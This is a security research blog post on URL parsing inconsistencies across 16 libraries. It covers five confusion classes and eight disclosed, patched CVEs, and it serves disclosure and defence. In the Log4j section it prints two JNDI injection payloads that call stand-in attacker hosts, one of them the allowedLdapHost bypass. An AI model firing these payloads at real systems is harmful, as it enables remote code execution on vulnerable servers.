Exploiting URL Parsing Confusion

Noam Moshe

/ January 10th, 2022

URL Vulnerabilities: Exploiting URL Parser Confusion

Executive Summary

Team82 and the Snyk research team collaborated on a research paper, available today, that examines URL parsing confusion.
Different libraries parse URLs in their own way, and these inconsistencies can be abused by attackers
We examined 16 URL parsing libraries including: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), curl lib (cURL), Wget, Chrome (Browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby) and URI (Perl).
Our paper describes five classes of inconsistencies between parsing libraries that can be exploited to cause denial-of-service conditions, information leaks, and under some circumstances, remote code execution
The five types of inconsistencies are: scheme confusion, slashes confusion, backslash confusion, URL encoded data confusion, and scheme mixup.
The Team82-Snyk research collaboration also uncovered eight vulnerabilities in web applications and third-party libraries (many written in different programming languages) used by web developers in apps
Among the eight vulnerabilities was a bug in libcurl. The issue was disclosed to cURL creator Daniel Stenberg, who patched it in the latest cURL version.

URLs are in many ways the hub of our digital lives, our link to critical services, news, entertainment, and much more. Therefore, any security vulnerabilities with how browsers, applications, and servers receive URL requests, parse them, and fetch requested resources could pose significant issues for users and harm trust in the internet.

Claroty's Team82, in collaboration with Snyk's research team, has conducted an extensive research project examining URL parsing primitives, and discovered major differences in the way many different parsing libraries and tools handle URLs. Today, we are publishing a research paper (free PDF download here) that describes our analysis, showcases the differences between parsers, and how URL parsing confusion may be abused. We also uncovered eight vulnerabilities that have been privately disclosed and patched.

Understanding URL Syntax

In order to understand how differences in URL parsing primitives could be abused, we first need a basic understanding of how URLs are built. URLs are actually built from five different components: scheme, authority, path, query and a fragment. Each component fulfills a different role, be it dictating the protocol for the request, the host which holds the resource, which exact resource should be fetched, and more. For example, a URL could look like this:

Over the years, there have been many RFCs that defined URLs, each making changes in an attempt to enhance the URL standard. However, the frequency of changes created major differences in URL parsers, each of which comply with a different RFC (in order to be backward compliant). Some, in fact, choose to ignore new RFCs altogether, instead adapting a URL specification they deem more reflective of how real-life URLs should be parsed. This created an environment in which one URL parser could interpret a URL differently than another. This could lead to some serious security concerns.

RFC History timeline — The history of URL-defining RFCs, starting with RFC 1738 which was written in 1994, and ending with the most up-to-date RFC, RFC 3986 which was written in 2005.

Recent Example: Log4j allowedLdapHost Bypass

In order to fully understand how dangerous confusion among URL parsing primitives can be, let's take a look into a real-life vulnerability that abused those differences. In December 2021, the world was taken by a storm by a remote code execution vulnerability in the Log4j library, a popular Java logging library. Because of Log4j's popularity, millions of servers and applications were affected, forcing administrators to determine where Log4j may be in their environments and their exposure to proof-of-concept attacks in the wild.

While we will not fully explain this vulnerability here—it was widely covered—the gist of the vulnerability originates in a malicious attacker-controlled string being evaluated whenever it is logged by an application, resulting in a JNDI (Java Naming and Directory Interface) lookup that connects to an attacker-specified server and loads malicious Java code.

A payload triggering this vulnerability could look like this:

${jndi:ldap://attacker.com:1389/a}

This payload would result in a remote class being loaded to the current Java context if this string were logged by a vulnerable application.

Team82 preauth RCE against VMware vCenter ESXi Server, exploiting the log4j vulnerability

Because of the popularity of this library, and the vast number of servers which this vulnerability affected, many patches and countermeasures were introduced in order to remedy this vulnerability. We will talk about one countermeasure in particular, which aimed to block any attempts to load classes from a remote source using JNDI.

This particular remedy was made inside the lookup process of the JNDI interface. Instead of allowing JNDI lookups from arbitrary remote sources, which could result in remote code execution, JNDI would allow only lookups from a set of predefined whitelisted hosts, allowedLdapHost, which by default contained only localhost. This would mean that even if an attacker-given input is evaluated and a JNDI lookup is made, the lookup process would fail if the given host is not in the whitelisted set. Therefore, an attacker-hosted class would not be loaded and the vulnerability rendered moot.

However, soon after this fix, a bypass to this mitigation was found (CVE-2021-45046), which once again allowed remote JNDI lookup and allowed the vulnerability to be exploited in order to achieve RCE. Let's analyze the bypass, which is as follows:

${jndi:ldap://127.0.0.1#.evilhost.com:1389/a}

As we can see, this payload once again contains a URL, however the Authority; component (host) of the URL seems irregular, containing two different hosts: 127.0.0.1 and evilhost.com. As it turns out, this is exactly where the bypass lies. This bypass stems from the fact that two different (!) URL parsers were used inside the JNDI lookup process, one parser for validating the URL, and another for fetching it, and depending on how each parser treats the Fragment portion (#) of the URL, the Authority changes too.

In order to validate that the URL's host is allowed, Java's URI class was used, which parsed the URL, extracted the host, and checked if the host is on the whitelist of allowed hosts. And indeed, if we parse this URL using Java's URI, we find out that the URL's host is 127.0.0.1, which is included in the whitelist. However, on certain operating systems (mainly macOS) and specific configurations, when the JNDI lookup process fetches this URL, it does not try to fetch it from 127.0.0.1, instead it makes a request to 127.0.0.1#.evilhost.com. This means that while this malicious payload will bypass the allowedLdapHost localhost validation (which is done by the URI parser), it will still try to fetch a class from a remote location.

This bypass showcases how minor discrepancies between URL parsers could create huge security concerns and real-life vulnerabilities.

Team82-Snyk Joint Research Outcomes

During our analysis, we've looked into the following libraries and tools written in numerous languages: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), curl lib (cURL), Wget, Chrome (Browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby) and URI (Perl).

As a result of our analysis, we were able to identify and categorize five different scenarios in which most URL parsers behaved unexpectedly:

Scheme Confusion: A confusion involving URLs with missing or malformed scheme
Slash Confusion: A confusion involving URLs containing an irregular number of slashes
Backslash Confusion: A confusion involving URLs containing backslashes (\)
URL-Encoded Data Confusion: A confusion involving URLs containing URL Encoded data
Scheme Mixup: A confusion involving parsing a URL belonging to a certain scheme without a scheme-specific parser

Using those five categories as a guideline, we've created the following table which showcases the differences between different URL parsers:

By abusing those inconsistencies, many possible vulnerabilities could arise, ranging from an server-side request forgery (SSRF) vulnerability, which could result in remote code execution, all the way to an open-redirect vulnerability which could result in a sophisticated phishing attack.

As a result of our research, we were able to identify the following vulnerabilities, which affect different frameworks and even different programming languages. The vulnerabilities below have been patched except for those found in unsupported versions of Flask:

Flask-security (Python, CVE-2021-23385)
Flask-security-too (Python, CVE-2021-32618)
Flask-User (Python, CVE-2021-23401)
Flask-unchained (Python, CVE-2021-23393)
Belledonne's SIP Stack (CVE-2021-33056)
Video.js (JavaScript, CVE-2021-23414)
Nagios XI (PHP, CVE-2021-37352)
Clearance (Ruby, CVE-2021-23435)

We invite you to download our paper to learn more about exploiting these parsing confusion scenarios, and a number of recommendations that blunt the impact of these vulnerabilities if they're exploited.

Our research was partially based on previous work, including a presentation by Orange Tsai "A New Era of SSRF" and a comparison of WHATWG vs. RFC 3986 by cURL creator, Daniel Stenberg. We would like to thank them for their innovative research.

Stay in the know Get the Team82 Newsletter

Related Vulnerability Disclosures

Exploiting URL Parsing Confusion

Executive Summary

Understanding URL Syntax

Recent Example: Log4j allowedLdapHost Bypass

Team82-Snyk Joint Research Outcomes

CVE-2021-23385

CVE-2021-32618

CVE-2021-23401

CVE-2021-23393

CVE-2021-33056

CVE-2021-37352